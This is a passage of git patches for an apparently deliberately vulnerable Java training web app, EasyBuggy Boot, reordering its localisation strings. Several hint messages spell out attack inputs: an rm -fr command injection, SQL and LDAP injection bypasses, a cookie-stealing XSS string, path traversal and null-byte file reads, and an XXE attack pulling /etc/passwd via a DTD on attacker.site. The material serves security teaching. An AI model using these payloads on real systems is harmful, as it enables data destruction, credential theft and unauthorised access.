Information -style.name.bootstrap=Bootstrap + +section.errors=Errors +section.exceptions=Unchecked Exception +section.performance.issue=Performance Issue +section.troubles=Troubles +section.vulnerabilities=Vulnerabilities + +style.description.basic=Basic header and footer are used. style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ -style.name.google.mdl=Google Material Design Lite style.description.google.mdl=For more detail, please refer to the page\: https\://getmdl.io/ -style.name.materialize=Materialize style.description.materialize=For more detail, please refer to the page\: http\://materializecss.com/ -style.name.nonstyle=Non-Style +style.description.monochro=Monochrome header and footer are used. +style.description.noframe=No header and footer are used. style.description.nonstyle=No stylesheet is specified. style.name.basic=Basic -style.description.basic=Basic header and footer are used. +style.name.bootstrap=Bootstrap +style.name.google.mdl=Google Material Design Lite +style.name.materialize=Materialize style.name.monochro=Monochrome -style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame -style.description.noframe=No header and footer are used. -title.filedescriptorleak.page=Access History +style.name.nonstyle=Non-Style + title.adminmain.page=Main Page for Administrators +title.clickjacking.page=Change Your Mail +title.clientinfo.page=Client Information +title.codeinjection.page=Parse JSON +title.commandinjection.page=Performing Basic Numeric Operations +title.createobjects.page=Sum of natural numbers +title.csrf.page=Change Your Password title.current.date=Display Current Date -title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time +title.dbconnectionleak.page=User List title.deadlock.page=Detect Deadlock +title.design.test.page=Design Test title.endlesswaiting.page=Execute Batch -title.nullbyteinjection.page=Download Guides -title.index.page=EasyBuggy Boot +title.filedescriptorleak.page=Access History +title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator title.memoryleak.page=Heap Memory Usage title.memoryleak2.page=Non-Heap Memory Usage +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones title.mojibake.page=Capitalize String -title.commandinjection.page=Performing Basic Numeric Operations -title.codeinjection.page=Parse JSON title.netsocketleak.page=Measure Response Time -title.strplusopr.page=Random String Generator +title.nullbyteinjection.page=Download Guides title.roundofferror.page=Easy Subtraction +title.serverinfo.page=Server Information title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number -title.createobjects.page=Sum of natural numbers -title.memoryleak3.page=Display Time Zone Information -title.memoryleak3.page.list=Lists of Time Zones +title.strplusopr.page=Random String Generator +title.threadleak.page=Display Current Thread Count title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File -title.dbconnectionleak.page=User List -title.xss.page=Reverse String title.xee.page=Batch Registration of Users +title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 14cd42af6b09f6ec40d532859c5979a0bf1549ec Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 24 Oct 2017 21:52:38 +0900 Subject: [PATCH 034/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 355 ++++++++++------------ 1 file changed, 165 insertions(+), 190 deletions(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index d02e954..5b6babb 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -1,148 +1,122 @@ #X-Generator: crowdin.com -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.\nThe result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. - -section.troubles=Troubles +description.access.history=Access history in this page (The latest 15 records). +description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. +description.design.test=Please click on one of the links below. +description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: +description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.performance.issue=Issues for performance +description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.reverse.string=If you enter a string, then the reversed string is shown. +description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: +description.send.mail=You can send a mail to the site administrator. +description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. description.troubles=Memory leak, infinite loop, deadlock, and so on\: +description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: -function.name.memory.leak=Memory Leak (Java heap space) -function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. -function.name.memory.leak2=Memory Leak ({0}) -function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. -function.name.memory.leak3=Memory Leak (C heap space) -function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. -function.name.infinite.loop=Infinite Loop -function.description.infinite.loop=Infinite loop occurs if you click this link. -function.name.dead.lock=Deadlock (Java) +function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. +function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.description.code.injection=There is a code injection vulnerability in this page. +function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. -function.name.dead.lock2=Deadlock (SQL) function.description.dead.lock2=Deadlock (SQL) can occur. -function.name.endless.waiting.process=Endless Waiting Process +function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. function.description.endless.waiting.process=Endless waiting process can occur. -function.name.jvm.crash.eav=JVM Crash -function.description.jvm.crash.eav=JVM crashes if you click this link. -function.name.redirect.loop=Redirect Loop -function.description.redirect.loop=Redirect loop occurs if you click this link. -function.name.forward.loop=Forward Loop -function.description.forward.loop=Forward loop occurs if you click this link. -function.name.network.socket.leak=Network Socket Leak -function.description.network.socket.leak=Network socket leak occurs every time you load this page. -function.name.database.connection.leak=Database Connection Leak -function.description.database.connection.leak=Database connection leak occurs every time you load the page. -function.name.file.descriptor.leak=File Descriptor Leak function.description.file.descriptor.leak=File descriptor leak occurs every time you load this page. -function.name.thread.leak=Thread Leak -function.description.thread.leak=Thread leak occurs every time you load this page. -function.name.mojibake=Mojibake -function.description.mojibake=Mojibake can occur. -function.name.int.overflow=Integer Overflow +function.description.forward.loop=Forward loop occurs if you click this link. +function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. -function.name.round.off.error=Round Off Error -function.description.round.off.error=Round off error can occur. -function.name.truncation.error=Truncation Error -function.description.truncation.error=Truncation error can occur. -function.name.cancellation.of.significant.digits=Cancellation of Significant Digits -function.description.cancellation.of.significant.digits=Cancellation of significant digits can occur. -function.name.loss.of.trailing.digits=Loss of Trailing Digits +function.description.jvm.crash.eav=JVM crashes if you click this link. +function.description.ldap.injection=There is an LDAP injection vulnerability in this page. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. - - -section.performance.issue=Performance Issue -description.performance.issue=Issues for performance - -function.name.slow.regular.expression=Delay due to regular expression parse +function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. +function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. +function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. +function.description.mojibake=Mojibake can occur. +function.description.network.socket.leak=Network socket leak occurs every time you load this page. +function.description.null.byte.injection=There is a null byte injection vulnerability in this page. +function.description.open.redirect=There is an open redirect vulnerability in this login page. +function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.description.path.traversal=There is a path traversal vulnerability in this page. +function.description.redirect.loop=Redirect loop occurs if you click this link. +function.description.round.off.error=Round off error can occur. +function.description.session.fixation=This login page is vulnerable for session fixation attack. function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. -function.name.stop.the.world=Stop the World -function.description.stop.the.world=Stop the World occurs if you click this link. - - -section.vulnerabilities=Vulnerabilities -description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: - -function.name.xss=XSS (Cross Site Scripting) -function.description.xss=There is a cross site scripting vulnerability in this page. -function.name.sql.injection=SQL Injection function.description.sql.injection=There is an SQL injection vulnerability in this page. -function.name.ldap.injection=LDAP Injection -function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.throwable={0} is thrown if you click this link. +function.description.truncation.error=Truncation error can occur. +function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.xee=There is an XEE vulnerability in this page. +function.description.xss=There is a cross site scripting vulnerability in this page. +function.description.xxe=There is an XXE vulnerability in this page. +function.name.brute.force=Login page that allows brute-force attacks +function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection -function.description.code.injection=There is a code injection vulnerability in this page. -function.name.os.command.injection=OS Command Injection -function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.dangerous.file.inclusion=Dangerous File Inclusion +function.name.database.connection.leak=Database Connection Leak +function.name.dead.lock=Deadlock (Java) +function.name.dead.lock2=Deadlock (SQL) +function.name.endless.waiting.process=Endless Waiting Process +function.name.file.descriptor.leak=File Descriptor Leak +function.name.forward.loop=Forward Loop +function.name.infinite.loop=Infinite Loop +function.name.int.overflow=Integer Overflow +function.name.jvm.crash.eav=JVM Crash +function.name.ldap.injection=LDAP Injection +function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection -function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.name.memory.leak=Memory Leak (Java heap space) +function.name.memory.leak2=Memory Leak ({0}) +function.name.memory.leak3=Memory Leak (C heap space) +function.name.mojibake=Mojibake +function.name.network.socket.leak=Network Socket Leak function.name.null.byte.injection=Null Byte Injection -function.description.null.byte.injection=There is a null byte injection vulnerability in this page. -function.name.unrestricted.size.upload=Size Unrestricted File Upload -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. -function.name.unrestricted.ext.upload=Extension Unrestricted File Upload -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.name.open.redirect=Login page that allows Open Redirect -function.description.open.redirect=There is an open redirect vulnerability in this login page. -function.name.brute.force=Login page that allows brute-force attacks -function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. -function.name.session.fixation=Login page that allows session fixation attacks -function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.name.verbose.error.message=Verbose Authentication Error Messages -function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. -function.name.dangerous.file.inclusion=Dangerous File Inclusion -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.name.os.command.injection=OS Command Injection function.name.path.traversal=Path Traversal -function.description.path.traversal=There is a path traversal vulnerability in this page. +function.name.redirect.loop=Redirect Loop +function.name.round.off.error=Round Off Error +function.name.session.fixation=Login page that allows session fixation attacks +function.name.slow.regular.expression=Delay due to regular expression parse +function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator +function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation +function.name.sql.injection=SQL Injection +function.name.thread.leak=Thread Leak +function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure -function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.name.csrf=CSRF (Cross-site Request Forgery) -function.description.csrf=There is a CSRF vulnerability in the change password page. -function.name.clickjacking=Clickjacking -function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.name.unrestricted.ext.upload=Extension Unrestricted File Upload +function.name.unrestricted.size.upload=Size Unrestricted File Upload +function.name.verbose.error.message=Verbose Authentication Error Messages function.name.xee=XEE (XML Entity Expansion) -function.description.xee=There is an XEE vulnerability in this page. +function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) -function.description.xxe=There is an XXE vulnerability in this page. - - -section.errors=Errors -description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: - -function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. - - -section.exceptions=Unchecked Exception -description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: -function.description.throwable={0} is thrown if you click this link. - - - -description.access.history=Access history in this page (The latest 15 records). -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String -description.design.page=You can change design of this page. Please click one of the links below and change \nthis page to your style. -description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. -description.random.string.generator=If you enter a character count, then a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. -description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. -description.send.mail=You can send a mail to the site administrator. label.access.time=Access Time -label.available.characters=Available Characters label.attach.file=Attach File +label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String label.character.count=Character Count label.code=Code label.content=Content -label.current.date=Current Date label.current.thread.count=Current Thread Count -label.current.time=Current Time label.execution.result=Execution Result\: -label.goto.admin.page=Go to admin main page label.go.to.main=Go to main page +label.goto.admin.page=Go to admin main page label.history.back=Back label.ip.address=IP Address label.json.string=JSON String @@ -153,22 +127,22 @@ label.login.user.id=Login User ID label.logout=Log out label.lowercase.characters=Lowercase Characters label.mail=Mail Address -label.memory.init=Init Value -label.memory.used=Used Init Value +label.memory.collection.usage=Collection Usage label.memory.committed=Committed Init Value +label.memory.init=Init Value label.memory.max=Max Init Value -label.memory.usage=Memory Usage label.memory.peak.usage=Peak Memory Usage -label.memory.collection.usage=Collection Usage +label.memory.usage=Memory Usage +label.memory.used=Used Init Value label.metaspace=Metaspace -label.permgen.space=PermGen space -label.platform=Platform label.name=Name label.numbers=Numbers label.obelus=/ label.password=Password +label.permgen.space=PermGen space label.phone=Phone label.ping.url=Ping URL +label.platform=Platform label.response.code=Response Code label.response.time=Response Time label.reversed.string=Reversed String @@ -179,14 +153,9 @@ label.string=String label.subject=Subject label.submit=Submit label.times=times -label.timezone.dst.savings=Amount of DST -label.timezone.has.same.rules=Same Rule as Default label.timezone.id=Time Zome ID -label.timezone.in.daylight.time=Being in DST label.timezone.name=Time Zome Name label.timezone.offset=Time Zome Offset -label.timezone.raw.offset=Amount of Raw Offset Time -label.timezone.use.daylight.time=Useing DST label.update=Update label.upload=Upload label.uppercase.characters=Uppercase Characters @@ -194,8 +163,9 @@ label.user.agent=User Agent label.user.id=User ID label.value=Value label.version=Version -label.your.name=Your Name label.your.mail=Your Mail Address +label.your.name=Your Name + msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! @@ -205,7 +175,6 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -216,140 +185,146 @@ msg.dead.lock.detected=Deadlock is detected. msg.dead.lock.not.occur=Deadlock has not occurred yet. msg.deadlock.occurs=A lock could not be obtained due to a deadlock. msg.download.file=You can download the following PDF files. +msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.name=Please enter your name. +msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. msg.enter.positive.number=Please enter a positive number. -msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. -msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. -msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. -msg.need.admin.privilege=You need admin privileges to go ahead from here. -msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. +msg.mail.change.failed=Mail address change failed. +msg.mail.changed=Your mail address is successfully changed. +msg.mail.format.is.invalid=The mail address is an invalid format. +msg.mail.is.empty=Please enter subject and content. +msg.match.regular.expression=The input string matches the regular expression. +msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.not.image.file=The chosen file is not an image file. +msg.not.match.regular.expression=The input string does not match the regular expression. +msg.not.xml.file=The chosen file is not an XML file. +msg.note.brute.force=You can login with admin and password. The number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you sort in the descending order and click the "update" button on the other, then deadlock occurs in database. msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.roundofferror=Round off error occurs if you enter 1. -msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 -msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. -msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.netsocketleak=Network socket leak occurs every time you load this page. -msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. +msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. -msg.not.image.file=The chosen file is not an image file. -msg.not.match.regular.expression=The input string does not match the regular expression. -msg.not.xml.file=The chosen file is not an XML file. -msg.mail.changed=Your mail address is successfully changed. -msg.mail.change.failed=Mail address change failed. -msg.mail.format.is.invalid=The mail address is an invalid format. -msg.mail.is.empty=Please enter subject and content. -msg.match.regular.expression=The input string matches the regular expression. -msg.max.file.size.exceed=The file size exceeds the allowable limit. -msg.passwd.changed=Your password is successfully changed. msg.passwd.change.failed=Password change failed. +msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. msg.password.not.match=The password does not match. -msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.question.reach.the.moon=How many times would you have to fold a piece of paper (thickness 0.1mm) for it to be thick enough to reach the moon (384,400 km)? msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. -msg.select.upload.file=Select a file to upload. -msg.note.threadleak=Thread leak occurs every time you load this page. -msg.user.not.exist=The user does not exist. +msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. +msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -title.clickjacking.page=Change Your Mail -title.csrf.page=Change Your Password -title.clientinfo.page=Client Information -title.design.test.page=Design Test -title.serverinfo.page=Server Information -style.name.bootstrap=Bootstrap + +section.errors=Errors +section.exceptions=Unchecked Exception +section.performance.issue=Performance Issue +section.troubles=Troubles +section.vulnerabilities=Vulnerabilities + +style.description.basic=Basic header and footer are used. style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ -style.name.google.mdl=Google Material Design Lite style.description.google.mdl=For more detail, please refer to the page\: https\://getmdl.io/ -style.name.materialize=Materialize style.description.materialize=For more detail, please refer to the page\: http\://materializecss.com/ -style.name.nonstyle=Non-Style +style.description.monochro=Monochrome header and footer are used. +style.description.noframe=No header and footer are used. style.description.nonstyle=No stylesheet is specified. style.name.basic=Basic -style.description.basic=Basic header and footer are used. +style.name.bootstrap=Bootstrap +style.name.google.mdl=Google Material Design Lite +style.name.materialize=Materialize style.name.monochro=Monochrome -style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame -style.description.noframe=No header and footer are used. -title.filedescriptorleak.page=Access History +style.name.nonstyle=Non-Style + title.adminmain.page=Main Page for Administrators +title.clickjacking.page=Change Your Mail +title.clientinfo.page=Client Information +title.codeinjection.page=Parse JSON +title.commandinjection.page=Performing Basic Numeric Operations +title.createobjects.page=Sum of natural numbers +title.csrf.page=Change Your Password title.current.date=Display Current Date -title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time +title.dbconnectionleak.page=User List title.deadlock.page=Detect Deadlock +title.design.test.page=Design Test title.endlesswaiting.page=Execute Batch -title.nullbyteinjection.page=Download Guides -title.index.page=EasyBuggy Boot +title.filedescriptorleak.page=Access History +title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator title.memoryleak.page=Heap Memory Usage title.memoryleak2.page=Non-Heap Memory Usage +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones title.mojibake.page=Capitalize String -title.commandinjection.page=Performing Basic Numeric Operations -title.codeinjection.page=Parse JSON title.netsocketleak.page=Measure Response Time -title.strplusopr.page=Random String Generator +title.nullbyteinjection.page=Download Guides title.roundofferror.page=Easy Subtraction +title.serverinfo.page=Server Information title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number -title.createobjects.page=Sum of natural numbers -title.memoryleak3.page=Display Time Zone Information -title.memoryleak3.page.list=Lists of Time Zones +title.strplusopr.page=Random String Generator +title.threadleak.page=Display Current Thread Count title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File -title.dbconnectionleak.page=User List -title.xss.page=Reverse String title.xee.page=Batch Registration of Users +title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 85338789e046ed9f060ae8c970865d437641c510 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 24 Oct 2017 21:52:40 +0900 Subject: [PATCH 035/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 355 ++++++++++------------ 1 file changed, 165 insertions(+), 190 deletions(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index d02e954..5b6babb 100644 --- a/src/main/resources/messages_es.properties 